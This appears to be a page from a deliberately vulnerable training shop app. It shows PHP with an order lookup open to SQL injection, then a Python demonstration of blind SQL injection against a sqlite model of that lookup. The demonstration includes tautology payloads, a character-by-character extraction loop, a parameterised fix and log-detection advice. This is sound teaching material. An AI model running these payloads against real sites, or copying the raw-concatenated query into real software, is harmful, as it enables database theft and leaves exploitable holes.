sekumart: deals so good it should be illegal

Source: track (security level: low)

Flip the security level in the header to compare the vulnerable and fixed code paths.

<?php
// LOW: the order code is concatenated raw into the query -> blind (boolean- or time-based)
// SQL injection. Only "found / not found" (plus the status text of a matching row) reaches
// the page; no result set or error text is echoed, which is exactly the blind scenario.
$o = isset($_GET['order']) ? $_GET['order'] : '';
$status = null; $found = false; $track_error = null;
if ($o !== '') {
    // Vulnerable: $o is untrusted and lands inside the SQL string unescaped.
    $q = "SELECT status FROM orders WHERE code='$o'";
    $res = @mysqli_query(db(), $q);      // '@' suppresses warnings; the query may still fail
    if ($res) {
        if ($row = mysqli_fetch_assoc($res)) { $found = true; $status = $row['status']; }
    } else {
        $track_error = mysqli_error(db()); // kept for the template; not part of the leak described above
    }
}
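To make the "only existence leaks" point concrete, here is an added example (not the shop's own PHP, and not code from this page) that models the LOW lookup in Python with an in-memory sqlite3 table and then drives it as a boolean-based blind oracle. The `orders` rows, the `track_low`/`track_safe` function names and the character set are constructed for the demonstration; the payload shape is the one the raw-concatenated `WHERE code='$o'` admits. The same extraction loop works against MySQL, which is where a time-based variant (`SLEEP()` in the true branch) would replace the found/not-found signal; that variant is not shown here.

```python
"""Boolean-based blind SQL injection against a model of the LOW 'track' lookup.
Added example using sqlite3; the table, rows and names are constructed here."""
import sqlite3

# Constructed fixture standing in for the shop's `orders` table.
ROWS = [("ORD-1001", "shipped"), ("ORD-1002", "pending"), ("ORD-1003", "cancelled")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE orders (code TEXT PRIMARY KEY, status TEXT)")
    con.executemany("INSERT INTO orders VALUES (?, ?)", ROWS)
    return con


def track_low(con, order):
    """Mirror of the LOW path: the order code is concatenated raw into the SQL.
    Returns (found, status), the only two things the page reveals."""
    q = f"SELECT status FROM orders WHERE code='{order}'"
    try:
        row = con.execute(q).fetchone()
    except sqlite3.Error:
        return (False, None)  # errors are swallowed, as with @mysqli_query
    return (True, row[0]) if row else (False, None)


def track_safe(con, order):
    """Hardened path: bound parameter, so the input is data and never parsed as SQL."""
    row = con.execute("SELECT status FROM orders WHERE code=?", (order,)).fetchone()
    return (True, row[0]) if row else (False, None)


# Alphabet the constructed order codes are drawn from (assumption for the demo).
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-"


def oracle(lookup, con, condition):
    """Ask one yes/no question. A true condition makes the WHERE clause match
    every row, so the page says 'found'; a false one yields 'not found'."""
    payload = f"x' OR ({condition}) -- "
    return lookup(con, payload)[0]


def extract_first_code(lookup, con, max_len=16):
    """Recover orders.code of the first row one character at a time using only
    the found/not-found oracle. Comparing SUBSTR() to a literal is portable
    (sqlite here; on MySQL you would usually binary-search over ASCII())."""
    sub = "(SELECT code FROM orders ORDER BY code LIMIT 1)"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(lookup, con, f"SUBSTR({sub},{pos},1)='{ch}'"):
                out += ch
                break
        else:
            break  # no character matched: end of string reached
    return out


if __name__ == "__main__":
    db = make_db()
    print("legit lookup  :", track_low(db, "ORD-1002"))
    print("tautology     :", track_low(db, "x' OR '1'='1"))
    print("blind extract :", extract_first_code(track_low, db))
    print("against safe  :", repr(extract_first_code(track_safe, db)))
```

The safe path returns `(False, None)` for every payload because the whole string is compared as a literal order code, so the oracle never answers "yes" and the extraction loop returns an empty string. Against the LOW path each recovered character costs at most `len(CHARSET)` requests, which is the traffic pattern to look for in access logs: a burst of `?order=` requests differing only in a position and a character.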